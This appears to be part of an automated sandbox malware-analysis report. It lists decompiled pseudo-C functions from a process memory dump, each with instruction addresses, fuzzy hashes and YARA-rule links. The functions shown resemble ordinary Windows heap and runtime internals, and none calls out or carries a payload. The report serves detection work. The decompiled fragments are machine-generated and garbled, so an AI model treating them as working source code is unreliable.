Instruction Fuzzy Hash: 0AF0E2B29177909FD731C728C204F22BFE89B05670F5C84ABD4368B305C7A4DCA8C651

Uniqueness

Uniqueness Score: -1.00%

Function 0370927A Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0370927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L036E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E0370FA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E037092C6(_t11, _t14);
				}
				return _t11;
			}

0x03709295
0x03709299
0x0370929f
0x037092aa
0x037092ad
0x037092ae
0x037092af
0x037092b0
0x037092b4
0x037092bb
0x037092bb
0x037092c5

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction ID: 080a494b0bcd8341d01be31f1e0bc4e9275cb926a18feb4e7cf747b3e141e08d
Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
Instruction Fuzzy Hash: 80E0ED72240600ABEB21DE1ACC84B0377A9AF82B20F044078BA001E292CAE6D80887A4

Uniqueness

Uniqueness Score: -1.00%

Function 03782073 Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E03782073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E0377FD22(__ecx);
				_t19 =  *0x37b849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x37b8748; // 0x0
					if(__eflags <= 0) {
						E03781C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x37b8724 & 0x00000004;
							if(( *0x37b8724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x37b8724; // 0x0
					return E03778DF1(__ebx, 0xc0000374, 0x37b5890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}

0x03782076
0x03782078
0x0378207d
0x03782083
0x037820a4
0x037820aa
0x037820ac
0x037820b7
0x037820ba
0x037820bc
0x037820c9
0x037820c9
0x037820d0
0x037820d2
0x00000000
0x037820d2
0x037820be
0x037820c3
0x037820c5
0x037820c7
0x00000000
0x00000000
0x037820c7
0x037820bc
0x037820d4
0x03782085
0x03782085
0x037820a3
0x037820a3

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8fb7ffc5eee4fe96dc1f03b23cd3ea608e7d58b9a5246a91de1c0a758d32c0c
Instruction ID: 6fd8d4811adbd279ab309078d49645fe46250144072d79a1453b2e6e76336e54
Opcode Fuzzy Hash: c8fb7ffc5eee4fe96dc1f03b23cd3ea608e7d58b9a5246a91de1c0a758d32c0c
Instruction Fuzzy Hash: 65F0A03A4552DC5BEE32FF647519BE26BA8D746125B1D5889D4902B20AD5388883CA22

Uniqueness

Uniqueness Score: -1.00%

Function 03798D34 Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E03798D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x37bd360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E036E7D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E0370B640(E03709AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}

0x03798d34
0x03798d43
0x03798d4b
0x03798d4e
0x03798d52
0x03798d5c
0x03798d6e
0x03798d5e
0x03798d67
0x03798d67
0x03798d79
0x03798d7a
0x03798d7c
0x03798d81
0x03798d94

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ee14003cb5edce305a58c063503877811b136626744f0875d973a291c983aca
Instruction ID: 90ba0d6e69171355c6a84fddbb303a6683ff74fa87d8fb7f47c70605e77e4433
Opcode Fuzzy Hash: 0ee14003cb5edce305a58c063503877811b136626744f0875d973a291c983aca
Instruction Fuzzy Hash: A0F03A75A04708EFDB14EFA8E545B6EB7B4EF18700F5080AAE905EB291EA74DA00CB55

Uniqueness

Uniqueness Score: -1.00%

Function 03798B58 Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E03798B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x37bd360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E036E7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0370B640(E03709AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x03798b67
0x03798b6f
0x03798b72
0x03798b7d
0x03798b8f
0x03798b7f
0x03798b88
0x03798b88
0x03798b9a
0x03798b9b
0x03798b9d
0x03798ba2
0x03798bb5

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 248ec3bb2c586e8eddb1afdbbd7e4714f488b8e1d0dfbcc1c1c3bfb3f02d8b1e
Instruction ID: 9c3817942da64511dc96f9e2b553e8c07760e1c69b987cd0d977574ae6caa3e0
Opcode Fuzzy Hash: 248ec3bb2c586e8eddb1afdbbd7e4714f488b8e1d0dfbcc1c1c3bfb3f02d8b1e
Instruction Fuzzy Hash: 38F082B4A04258EBDF10EBA8E906E6EB3B4EF04304F040559BA15EF3D1EB74D900C799

Uniqueness

Uniqueness Score: -1.00%

Function 036C4F2E Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E036C4F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E037988F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E036EC5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x36a1030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}

0x036c4f2e
0x036c4f34
0x036c4f38
0x03720b85
0x03720b85
0x03720b89
0x03720b9a
0x03720b9a
0x03720b9f
0x00000000
0x03720b9f
0x03720b94
0x03720b98
0x00000000
0x00000000
0x00000000
0x03720b98
0x036c4f3e
0x036c4f48
0x00000000
0x036c4f6e
0x00000000
0x036c4f70

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a1bc9585fcf99bf929b5ce1fd5e8226f7207db85247011533e708fb02558e2a
Instruction ID: f768b22da0f77f9178ccfdc7c3ef8e8dc987e8cc954eacc538e78eb9cd1d3e7b
Opcode Fuzzy Hash: 4a1bc9585fcf99bf929b5ce1fd5e8226f7207db85247011533e708fb02558e2a
Instruction Fuzzy Hash: 3BF0E2365267A89FD771C718C944F22BBD9EB0177CF0844A9E4058B920CB24EC44CEA0

Uniqueness

Uniqueness Score: -1.00%

Function 036E746D Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E036E746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E036DEB70(__ecx, 0x37b79a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E037095D0();
							L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}

0x036e746d
0x036e746d
0x036e746d
0x036e7471
0x036e7488
0x0372f92d
0x036e748e
0x036e7491
0x036e7495
0x0372f937
0x0372f93a
0x0372f94e
0x0372f953
0x0372f956
0x0372f956
0x036e7495
0x00000000
0x036e7488
0x036e7473
0x036e7478
0x036e747d
0x036e7481
0x00000000
0x036e7481
0x036e747d
0x036e747a
0x00000000

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 748c46809fa44edb794f6700d95132e3d418a6b2bd007da18b105d65f027c030
Instruction ID: 37e7ec6cd5ff871100a43626c332b7e56b7c965a41e6f3b0d9834aac6142e9ac
Opcode Fuzzy Hash: 748c46809fa44edb794f6700d95132e3d418a6b2bd007da18b105d65f027c030
Instruction Fuzzy Hash: 52F0E23A903244EADF11DB68C940F7ABFB1AF04210F080259E8E1AB2E1E7259805C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 03798CD6 Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E03798CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x37bd360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E036E7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0370B640(E03709AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}

0x03798ce5
0x03798ced
0x03798cf0
0x03798cfb
0x03798d0d
0x03798cfd
0x03798d06
0x03798d06
0x03798d18
0x03798d19
0x03798d1b
0x03798d20
0x03798d33

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c753ae465595980cb2f9dd4e9b8e34fca131120b0d8eb7909dbf73f1c7ab78a
Instruction ID: fb024395948d568bc543b4f8a24ef75b583b147481423a3a665ddfeba1433008
Opcode Fuzzy Hash: 4c753ae465595980cb2f9dd4e9b8e34fca131120b0d8eb7909dbf73f1c7ab78a
Instruction Fuzzy Hash: 43F08275A05208EBDF04EFB8E945E6E77B4EF09204F14019AE915EB2D1EA34D900C755

Uniqueness

Uniqueness Score: -1.00%

Function 036FA44B Relevance: .0, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E036FA44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x37b7b9c; // 0x0
				_t15 = __ecx;
				_t16 = L036E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E0370FA60(_t17, 0, _t15 << 2);
				return _t17;
			}

0x036fa44b
0x036fa453
0x036fa472
0x036fa476
0x00000000
0x036fa493
0x036fa47a
0x036fa47f
0x036fa486
0x00000000

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73e271bf059b76f6b67231a13ca83dd32132eaead689fccc320829598e8975a6
Instruction ID: e822755851ec523a1415987a934bb53746678d858fee11c272c94816cd2de95c
Opcode Fuzzy Hash: 73e271bf059b76f6b67231a13ca83dd32132eaead689fccc320829598e8975a6
Instruction Fuzzy Hash: 3CE09272A01821ABD2229A58ED00F67B3ADDBD5A51F094039E608DB254DA28DD12CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 036CF358 Relevance: .0, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E036CF358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E036FF3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L036E4620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}

0x036cf35d
0x036cf361
0x036cf367
0x036cf372
0x036cf38c
0x036cf38c
0x036cf394

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction ID: bad051f1e95fd481ec7941cfa0443135903d03c6ae40e2bfa4e79fc962c47b10
Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
Instruction Fuzzy Hash: 39E0D832A41218BBCB21D6D99E05FAABBADDB44A60F04015AF908DF190D9609D00C3D0

Uniqueness

Uniqueness Score: -1.00%

Function 036DFF60 Relevance: .0, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E036DFF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x36a11a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E037988F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E036E0050(_t14);
				}
			}

0x036dff66
0x036dff6b
0x00000000
0x036dff8f
0x00000000
0x036dff8f

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a311f3c7374695b710a2b9f02bff0d23cea6796a23255993370a7e150a86174
Instruction ID: 77df1a0340ced31e823f76c7c4d345c042e724a32fd89eb50342ebeddb6f87f2
Opcode Fuzzy Hash: 9a311f3c7374695b710a2b9f02bff0d23cea6796a23255993370a7e150a86174
Instruction Fuzzy Hash: F0E0DFB4A053049FDB34DF56D240F2D7B9C9B42629F1D809EE00A4F201CA21D881C65A

Uniqueness

Uniqueness Score: -1.00%

Function 0377D380 Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0377D380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L036CE8B0(__ecx, _a4, 0xfff);
					L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}

0x0377d38a
0x0377d39b
0x0377d3b1
0x00000000
0x0377d3b6
0x00000000

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction ID: 2b8049489e1fa6b60066425543f31eb022209334636e702a21e39a2ab501a445
Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
Instruction Fuzzy Hash: B9E08C35281244EBDF229A44CC00B797A2AEF447A1F204039FE085A690C6759C91E6C8

Uniqueness

Uniqueness Score: -1.00%

Function 037541E8 Relevance: .0, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E037541E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x37a08f0);
				_t5 = E0371D08C(__ebx, __edi, __esi);
				if( *0x37b87ec == 0) {
					E036DEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x37b87ec == 0) {
						 *0x37b87f0 = 0x37b87ec;
						 *0x37b87ec = 0x37b87ec;
						 *0x37b87e8 = 0x37b87e4;
						 *0x37b87e4 = 0x37b87e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L03754248();
				}
				return E0371D0D1(_t5);
			}

0x037541e8
0x037541ea
0x037541ef
0x037541fb
0x03754206
0x0375420b
0x03754216
0x0375421d
0x03754222
0x0375422c
0x03754231
0x03754231
0x03754236
0x0375423d
0x0375423d
0x03754247

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 447c52fb3736779c2395160e8a748d39db4d9b28b5fd7d460a5e22afedb6767c
Instruction ID: a19b078f56b8d3d16c116c38fc034dc3b1cede9042b39f3e57126491a49b9681
Opcode Fuzzy Hash: 447c52fb3736779c2395160e8a748d39db4d9b28b5fd7d460a5e22afedb6767c
Instruction Fuzzy Hash: 8BF039798107A8EFDBA0FFE9D508B2836BCF74431AF10816F90008B288E7784481CF06

Uniqueness

Uniqueness Score: -1.00%

Function 036FA185 Relevance: .0, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E036FA185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x37b67e4 >= 0xa) {
					if(_t5 < 0x37b6800 || _t5 >= 0x37b6900) {
						return L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E036E0010(0x37b67e0, _t5);
				}
			}

0x036fa190
0x036fa1a6
0x036fa1c2
0x00000000
0x00000000
0x00000000
0x036fa192
0x036fa192
0x036fa19f
0x036fa19f

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab87fcdf63eb466a532dc81a0fd112a432f578708057006b0dd9504d959cfd68
Instruction ID: f82168b13b9c72ea13ca96de5936b93eb9d7c89b06819480577fffb1a6f490d0
Opcode Fuzzy Hash: ab87fcdf63eb466a532dc81a0fd112a432f578708057006b0dd9504d959cfd68
Instruction Fuzzy Hash: FCD02B215210041FE61CF384D924B222636E784700F31441CE30B0E594DB6088D8950C

Uniqueness

Uniqueness Score: -1.00%

Function 036F16E0 Relevance: .0, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E036F16E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E036F1710(0x37b67e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L036E4620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}

0x036f16e8
0x036f16ef
0x036f16f3
0x036f16fe
0x00000000
0x036f1700
0x036f170d
0x036f170d
0x036f16f2
0x036f16f2
0x036f16f2
0x036f16f2

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b0554a968bb209c887059b1c270d7aa700db20fca48c415bde1414c72b724b5
Instruction ID: 68e49fbd15a0ccb251cd2b0c5b0dc8a5aad4bcf827955ade30bd75420685c296
Opcode Fuzzy Hash: 9b0554a968bb209c887059b1c270d7aa700db20fca48c415bde1414c72b724b5
Instruction Fuzzy Hash: 83D0A931201200EAEE2EDB219918B142266EB81BC1F3C006CF31B5E9C0DFB1DCB2E04C

Uniqueness

Uniqueness Score: -1.00%

Function 037453CA Relevance: .0, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E037453CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E036DEB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}

0x037453ca
0x037453ce
0x037453d9
0x037453de
0x037453e1
0x037453e1
0x037453e6
0x037453f3
0x00000000
0x037453f8
0x037453fb

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction ID: 9d7ec5aab3e0564513196116bf5de7001208befa03cea4cfdbe55ef076cf9f62
Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
Instruction Fuzzy Hash: 30E08236A007809BCF12EB88CA90F4EB7F9FB89B00F280048A0086F620C724AC00CB00

Uniqueness

Uniqueness Score: -1.00%

Function 036DAAB0 Relevance: .0, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E036DAAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}

0x036daab6
0x036daabb
0x0372a442
0x00000000
0x0372a448
0x0372a454
0x0372a454
0x036daac1
0x036daac1
0x036daac6
0x036daac6

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
Instruction ID: 47ab607accf7e9ec17258ab20be4757ac7a5cec9efdfa5c33b2d2808782a5ce5
Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
